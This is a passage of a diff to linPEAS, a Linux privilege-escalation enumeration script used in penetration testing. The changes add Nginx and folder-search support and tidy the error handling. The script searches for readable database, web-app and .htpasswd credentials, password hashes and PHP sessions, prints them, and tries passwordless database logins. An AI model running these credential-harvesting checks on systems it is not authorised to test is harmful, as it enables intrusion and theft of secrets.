"s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" fi done echo "" #-- UI) Sudo tokens print_2title "Checking sudo tokens" -print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#reusing-sudo-tokens" +print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens" ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)" if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0)" | sed "s,is disabled,${SED_RED},g"; else echo "ptrace protection is enabled ($ptrace_scope)" | sed "s,is enabled,${SED_GREEN},g"; @@ -2264,7 +2912,7 @@ fi #-- UI) Pkexec policy print_2title "Checking Pkexec policy" -print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe#pe-method-2" +print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2" (cat /etc/polkit-1/localauthority.conf.d/* 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED}," | sed -${E} "s,$groupsVB,${SED_RED}," | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," | sed -${E} "s,$Groups,${SED_RED_YELLOW},") || echo_not_found "/etc/polkit-1/localauthority.conf.d" echo "" @@ -2388,26 +3036,32 @@ print_title "Software Information" #--------) Software Information (---------# ########################################### +NGINX_KNOWN_MODULES="ngx_http_geoip_module.so|ngx_http_xslt_filter_module.so|ngx_stream_geoip_module.so|ngx_http_image_filter_module.so|ngx_mail_module.so|ngx_stream_module.so" + #-- SI) Useful software -print_2title "Useful software" -for tool in $USEFUL_SOFTWARE; do command -v "$tool"; done -echo "" - -#-- SI) Search for compilers -print_2title "Installed Compilers" -(dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; command -v gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/"); -echo "" - -if [ "$(command -v pkg 2>/dev/null)" ]; then - print_2title "Vulnerable Packages" - pkg audit -F | sed -${E} "s,vulnerable,${SED_RED},g" - echo "" +if ! [ "$SEARCH_IN_FOLDER" ]; then + print_2title "Useful software" + for tool in $USEFUL_SOFTWARE; do command -v "$tool"; done + echo "" fi -if [ "$(command -v brew 2>/dev/null)" ]; then - print_2title "Brew Installed Packages" - brew list - echo "" +#-- SI) Search for compilers +if ! [ "$SEARCH_IN_FOLDER" ]; then + print_2title "Installed Compilers" + (dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; command -v gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/"); + echo "" + + if [ "$(command -v pkg 2>/dev/null)" ]; then + print_2title "Vulnerable Packages" + pkg audit -F | sed -${E} "s,vulnerable,${SED_RED},g" + echo "" + fi + + if [ "$(command -v brew 2>/dev/null)" ]; then + print_2title "Brew Installed Packages" + brew list + echo "" + fi fi if [ "$MACPEAS" ]; then @@ -2429,6 +3083,11 @@ fi if [ "$(command -v mysql)" ] || [ "$(command -v mysqladmin)" ] || [ "$DEBUG" ]; then print_2title "MySQL version" mysql --version 2>/dev/null || echo_not_found "mysql" + mysqluser=$(systemctl status mysql 2>/dev/null | grep -o ".\{0,0\}user.\{0,50\}" | cut -d '=' -f2 | cut -d ' ' -f1) + if [ "$mysqluser" ]; then + echo "MySQL user: $mysqluser" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + fi + echo "" echo "" #-- SI) Mysql connection root/root @@ -2464,30 +3123,46 @@ fi if [ "$PSTORAGE_MYSQL" ] || [ "$DEBUG" ]; then print_2title "Searching mysql credentials and exec" printf "%s\n" "$PSTORAGE_MYSQL" | while read d; do - for f in $(find $d -name debian.cnf 2>/dev/null); do - if [ -r "$f" ]; then - echo "We can read the mysql debian.cnf. You can use this username/password to log in MySQL" | sed -${E} "s,.*,${SED_RED}," - cat "$f" + if [ -f "$d" ] && ! [ "$(basename $d)" = "mysql" ]; then # Only interested in "mysql" that are folders (filesaren't the ones with creds) + STRINGS="`command -v strings`" + echo "Potential file containing credentials:" + ls -l "$d" + if [ "$STRINGS" ]; then + strings "$d" + else + echo "Strings not found, cat the file and check it to get the creds" fi - done - for f in $(find $d -name user.MYD 2>/dev/null); do - if [ -r "$f" ]; then - echo "We can read the Mysql Hashes from $f" | sed -${E} "s,.*,${SED_RED}," - grep -oaE "[-_\.\*a-Z0-9]{3,}" $f | grep -v "mysql_native_password" - fi - done - for f in $(grep -lr "user\s*=" $d 2>/dev/null | grep -v "debian.cnf"); do - if [ -r "$f" ]; then - u=$(cat "$f" | grep -v "#" | grep "user" | grep "=" 2>/dev/null) - echo "From '$f' Mysql user: $u" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - fi - done - for f in $(find $d -name my.cnf 2>/dev/null); do - if [ -r "$f" ]; then - echo "Found readable $f" - grep -v "^#" "$f" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed "s,password.*,${SED_RED}," - fi - done + + else + for f in $(find $d -name debian.cnf 2>/dev/null); do + if [ -r "$f" ]; then + echo "We can read the mysql debian.cnf. You can use this username/password to log in MySQL" | sed -${E} "s,.*,${SED_RED}," + cat "$f" + fi + done + + for f in $(find $d -name user.MYD 2>/dev/null); do + if [ -r "$f" ]; then + echo "We can read the Mysql Hashes from $f" | sed -${E} "s,.*,${SED_RED}," + grep -oaE "[-_\.\*a-Z0-9]{3,}" "$f" | grep -v "mysql_native_password" + fi + done + + for f in $(grep -lr "user\s*=" $d 2>/dev/null | grep -v "debian.cnf"); do + if [ -r "$f" ]; then + u=$(cat "$f" | grep -v "#" | grep "user" | grep "=" 2>/dev/null) + echo "From '$f' Mysql user: $u" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + fi + done + + for f in $(find $d -name my.cnf 2>/dev/null); do + if [ -r "$f" ]; then + echo "Found readable $f" + grep -v "^#" "$f" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed "s,password.*,${SED_RED}," + fi + done + fi + mysqlexec=$(whereis lib_mysqludf_sys.so 2>/dev/null | grep "lib_mysqludf_sys\.so") if [ "$mysqlexec" ]; then echo "Found $mysqlexec" @@ -2499,18 +3174,18 @@ echo "" if [ "$PSTORAGE_MARIADB" ] || [ "$DEBUG" ]; then print_2title "Analyzing MariaDB Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_MARIADB\" | grep -E \"mariadb\.cnf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "mariadb.cnf"; fi; fi; printf "%s" "$PSTORAGE_MARIADB" | grep -E "mariadb\.cnf$" | while read f; do ls -ld "$f" | sed -${E} "s,mariadb\.cnf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,user.*|password.*,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_MARIADB\" | grep -E \"debian\.cnf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "debian.cnf"; fi; fi; printf "%s" "$PSTORAGE_MARIADB" | grep -E "debian\.cnf$" | while read f; do ls -ld "$f" | sed -${E} "s,debian\.cnf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "user.*|password.*" | sed -${E} "s,user.*|password.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_MARIADB\" | grep -E \"mariadb\.cnf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "mariadb.cnf"; fi; fi; printf "%s" "$PSTORAGE_MARIADB" | grep -E "mariadb\.cnf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,mariadb\.cnf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,user.*|password.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_MARIADB\" | grep -E \"debian\.cnf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "debian.cnf"; fi; fi; printf "%s" "$PSTORAGE_MARIADB" | grep -E "debian\.cnf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,debian\.cnf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "user.*|password.*" | sed -${E} "s,user.*|password.*,${SED_RED},g"; done; echo ""; fi if [ "$PSTORAGE_POSTGRESQL" ] || [ "$DEBUG" ]; then print_2title "Analyzing PostgreSQL Files (limit 70)" echo "Version: $(warn_exec psql -V 2>/dev/null)" - if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pgadmin.*\.db$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pgadmin*.db"; fi; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pgadmin.*\.db$" | while read f; do ls -ld "$f" | sed -${E} "s,pgadmin.*\.db$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pg_hba\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pg_hba.conf"; fi; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pg_hba\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,pg_hba\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"postgresql\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "postgresql.conf"; fi; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "postgresql\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,postgresql\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pgsql\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pgsql.conf"; fi; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pgsql\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,pgsql\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pgadmin.*\.db$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pgadmin*.db"; fi; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pgadmin.*\.db$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,pgadmin.*\.db$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pg_hba\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pg_hba.conf"; fi; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pg_hba\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,pg_hba\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"postgresql\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "postgresql.conf"; fi; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "postgresql\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,postgresql\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pgsql\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pgsql.conf"; fi; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pgsql\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,pgsql\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo ""; fi @@ -2523,7 +3198,7 @@ if [ "$TIMEOUT" ] && [ "$(command -v psql)" ] || [ "$DEBUG" ]; then # In some O fi print_list "PostgreSQL connection to template1 using postgres/NOPASS ........ " - if [ "$(timeout 1 psql -U postgres -d template1 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed "s,.)*,${SED_RED}," + if [ "$(timeout 1 psql -U postgres -d template1 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed "s,.*,${SED_RED}," else echo_no fi @@ -2542,127 +3217,132 @@ fi if [ "$PSTORAGE_MONGO" ] || [ "$DEBUG" ]; then print_2title "Analyzing Mongo Files (limit 70)" echo "Version: $(warn_exec mongo --version 2>/dev/null; warn_exec mongod --version 2>/dev/null)" - if ! [ "`echo \"$PSTORAGE_MONGO\" | grep -E \"mongod.*\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "mongod*.conf"; fi; fi; printf "%s" "$PSTORAGE_MONGO" | grep -E "mongod.*\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,mongod.*\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#"; done; echo ""; + if [ "$(command -v mongo)" ]; then echo "show dbs" | mongo 127.0.0.1 > /dev/null 2>&1;[ "$?" == "0" ] && echo "Possible mongo anonymous authentication" | sed -${E} "s,.*|kube,${SED_RED},"; fi + if ! [ "`echo \"$PSTORAGE_MONGO\" | grep -E \"mongod.*\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "mongod*.conf"; fi; fi; printf "%s" "$PSTORAGE_MONGO" | grep -E "mongod.*\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,mongod.*\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#"; done; echo ""; fi -if [ "$PSTORAGE_APACHE" ] || [ "$DEBUG" ]; then - print_2title "Analyzing Apache Files (limit 70)" - echo "Version: $(warn_exec apache2 -v 2>/dev/null; warn_exec httpd -v 2>/dev/null)" +if [ "$PSTORAGE_APACHE_NGINX" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Apache-Nginx Files (limit 70)" + echo "Apache version: $(warn_exec apache2 -v 2>/dev/null; warn_exec httpd -v 2>/dev/null)" + echo "Nginx version: $(warn_exec nginx -v 2>/dev/null)" + if [ -d "/etc/apache2" ] && [ -r "/etc/apache2" ]; then grep -R -B1 "httpd-php" /etc/apache2 2>/dev/null; fi + if [ -d "/usr/share/nginx/modules" ] && [ -r "/usr/share/nginx/modules" ]; then print_3title 'Nginx modules'; ls /usr/share/nginx/modules | sed -${E} "s,$NGINX_KNOWN_MODULES,${SED_GREEN},g"; fi print_3title 'PHP exec extensions' - grep -R -B1 "httpd-php" /etc/apache2 2>/dev/null - if ! [ "`echo \"$PSTORAGE_APACHE\" | grep -E \"sites-enabled$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sites-enabled"; fi; fi; printf "%s" "$PSTORAGE_APACHE" | grep -E "sites-enabled$" | while read f; do ls -ld "$f" | sed -${E} "s,sites-enabled$,${SED_RED},"; find "$f" -name "*" | while read ff; do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "AuthType|AuthName|AuthUserFile|ServerName|ServerAlias" | grep -Ev "#" | sed -${E} "s,AuthType|AuthName|AuthUserFile|ServerName|ServerAlias,${SED_RED},g"; done; echo "";done; echo ""; - if ! [ "`echo \"$PSTORAGE_APACHE\" | grep -E \"000-default\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "000-default.conf"; fi; fi; printf "%s" "$PSTORAGE_APACHE" | grep -E "000-default\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,000-default\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,AuthType|AuthName|AuthUserFile|ServerName|ServerAlias,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_APACHE\" | grep -E \"php\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "php.ini"; fi; fi; printf "%s" "$PSTORAGE_APACHE" | grep -E "php\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,php\.ini$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E allow_ | grep -Ev "^;" | sed -${E} "s,On,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_APACHE_NGINX\" | grep -E \"sites-enabled$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sites-enabled"; fi; fi; printf "%s" "$PSTORAGE_APACHE_NGINX" | grep -E "sites-enabled$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,sites-enabled$,${SED_RED},"; find "$f" -name "*" | while read ff; do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "#" | sed -${E} "s,AuthType|AuthName|AuthUserFile|ServerName|ServerAlias|command on,${SED_RED},g"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_APACHE_NGINX\" | grep -E \"000-default\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "000-default.conf"; fi; fi; printf "%s" "$PSTORAGE_APACHE_NGINX" | grep -E "000-default\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,000-default\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "#" | sed -${E} "s,AuthType|AuthName|AuthUserFile|ServerName|ServerAlias,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_APACHE_NGINX\" | grep -E \"php\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "php.ini"; fi; fi; printf "%s" "$PSTORAGE_APACHE_NGINX" | grep -E "php\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,php\.ini$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E allow_ | grep -Ev "^;" | sed -${E} "s,On,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_APACHE_NGINX\" | grep -E \"nginx\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "nginx.conf"; fi; fi; printf "%s" "$PSTORAGE_APACHE_NGINX" | grep -E "nginx\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,nginx\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "#" | sed -${E} "s,location.*.php$|$uri|$document_uri|proxy_intercept_errors.*on|proxy_hide_header.*|merge_slashes.*on|resolver.*|proxy_pass|internal|location.+[a-zA-Z0-9][^/]\s+\{|map|proxy_set_header.*Upgrade.*http_upgrade|proxy_set_header.*Connection.*http_connection,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_APACHE_NGINX\" | grep -E \"nginx$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "nginx"; fi; fi; printf "%s" "$PSTORAGE_APACHE_NGINX" | grep -E "nginx$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,nginx$,${SED_RED},"; find "$f" -name "*.conf" | while read ff; do ls -ld "$ff" | sed -${E} "s,.conf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "#" | sed -${E} "s,location.*.php$|$uri|$document_uri|proxy_intercept_errors.*on|proxy_hide_header.*|merge_slashes.*on|resolver.*|proxy_pass|internal|location.+[a-zA-Z0-9][^/]\s+\{|map|proxy_set_header.*Upgrade.*http_upgrade|proxy_set_header.*Connection.*http_connection,${SED_RED},g"; done; echo "";done; echo ""; fi if [ "$PSTORAGE_TOMCAT" ] || [ "$DEBUG" ]; then print_2title "Analyzing Tomcat Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_TOMCAT\" | grep -E \"tomcat-users\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "tomcat-users.xml"; fi; fi; printf "%s" "$PSTORAGE_TOMCAT" | grep -E "tomcat-users\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,tomcat-users\.xml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "username=|password=" | sed -${E} "s,dbtype|dbhost|dbuser|dbhost|dbpass|dbport,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_TOMCAT\" | grep -E \"tomcat-users\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "tomcat-users.xml"; fi; fi; printf "%s" "$PSTORAGE_TOMCAT" | grep -E "tomcat-users\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,tomcat-users\.xml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "username=|password=" | sed -${E} "s,dbtype|dbhost|dbuser|dbhost|dbpass|dbport,${SED_RED},g"; done; echo ""; fi if [ "$PSTORAGE_FASTCGI" ] || [ "$DEBUG" ]; then print_2title "Analyzing FastCGI Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_FASTCGI\" | grep -E \"fastcgi_params$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "fastcgi_params"; fi; fi; printf "%s" "$PSTORAGE_FASTCGI" | grep -E "fastcgi_params$" | while read f; do ls -ld "$f" | sed -${E} "s,fastcgi_params$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "DB_NAME|DB_USER|DB_PASS" | sed -${E} "s,DB_NAME|DB_USER|DB_PASS,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FASTCGI\" | grep -E \"fastcgi_params$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "fastcgi_params"; fi; fi; printf "%s" "$PSTORAGE_FASTCGI" | grep -E "fastcgi_params$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,fastcgi_params$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "DB_NAME|DB_USER|DB_PASS" | sed -${E} "s,DB_NAME|DB_USER|DB_PASS,${SED_RED},g"; done; echo ""; fi if [ "$PSTORAGE_HTTP_CONF" ] || [ "$DEBUG" ]; then print_2title "Analyzing Http conf Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_HTTP_CONF\" | grep -E \"httpd\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "httpd.conf"; fi; fi; printf "%s" "$PSTORAGE_HTTP_CONF" | grep -E "httpd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,httpd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "htaccess.*|htpasswd.*" | grep -Ev "\W+\#|^#" | sed -${E} "s,htaccess.*|htpasswd.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_HTTP_CONF\" | grep -E \"httpd\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "httpd.conf"; fi; fi; printf "%s" "$PSTORAGE_HTTP_CONF" | grep -E "httpd\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,httpd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "htaccess.*|htpasswd.*" | grep -Ev "\W+\#|^#" | sed -${E} "s,htaccess.*|htpasswd.*,${SED_RED},g"; done; echo ""; fi if [ "$PSTORAGE_HTPASSWD" ] || [ "$DEBUG" ]; then print_2title "Analyzing Htpasswd Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_HTPASSWD\" | grep -E \"\.htpasswd$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".htpasswd"; fi; fi; printf "%s" "$PSTORAGE_HTPASSWD" | grep -E "\.htpasswd$" | while read f; do ls -ld "$f" | sed -${E} "s,\.htpasswd$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_HTPASSWD\" | grep -E \"\.htpasswd$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".htpasswd"; fi; fi; printf "%s" "$PSTORAGE_HTPASSWD" | grep -E "\.htpasswd$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.htpasswd$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; fi if [ "$PSTORAGE_PHP_SESSIONS" ] || [ "$DEBUG" ]; then print_2title "Analyzing PHP Sessions Files (limit 70)" ls /var/lib/php/sessions 2>/dev/null || echo_not_found /var/lib/php/sessions - if ! [ "`echo \"$PSTORAGE_PHP_SESSIONS\" | grep -E \"sess_.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sess_*"; fi; fi; printf "%s" "$PSTORAGE_PHP_SESSIONS" | grep -E "sess_.*$" | while read f; do ls -ld "$f" | sed -${E} "s,sess_.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_PHP_SESSIONS\" | grep -E \"sess_.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sess_*"; fi; fi; printf "%s" "$PSTORAGE_PHP_SESSIONS" | grep -E "sess_.*$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,sess_.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; fi if [ "$PSTORAGE_WORDPRESS" ] || [ "$DEBUG" ]; then print_2title "Analyzing Wordpress Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_WORDPRESS\" | grep -E \"wp-config\.php$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "wp-config.php"; fi; fi; printf "%s" "$PSTORAGE_WORDPRESS" | grep -E "wp-config\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,wp-config\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "PASSWORD|USER|NAME|HOST" | sed -${E} "s,PASSWORD|USER|NAME|HOST,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WORDPRESS\" | grep -E \"wp-config\.php$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "wp-config.php"; fi; fi; printf "%s" "$PSTORAGE_WORDPRESS" | grep -E "wp-config\.php$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,wp-config\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "PASSWORD|USER|NAME|HOST" | sed -${E} "s,PASSWORD|USER|NAME|HOST,${SED_RED},g"; done; echo ""; fi if [ "$PSTORAGE_DRUPAL" ] || [ "$DEBUG" ]; then print_2title "Analyzing Drupal Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_DRUPAL\" | grep -E \"settings\.php$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "settings.php"; fi; fi; printf "%s" "$PSTORAGE_DRUPAL" | grep -E "settings\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,settings\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "drupal_hash_salt|'database'|'username'|'password'|'host'|'port'|'driver'|'prefix'" | sed -${E} "s,drupal_hash_salt|'database'|'username'|'password'|'host'|'port'|'driver'|'prefix',${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_DRUPAL\" | grep -E \"settings\.php$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "settings.php"; fi; fi; printf "%s" "$PSTORAGE_DRUPAL" | grep -E "settings\.php$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,settings\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "drupal_hash_salt|'database'|'username'|'password'|'host'|'port'|'driver'|'prefix'" | sed -${E} "s,drupal_hash_salt|'database'|'username'|'password'|'host'|'port'|'driver'|'prefix',${SED_RED},g"; done; echo ""; fi if [ "$PSTORAGE_MOODLE" ] || [ "$DEBUG" ]; then 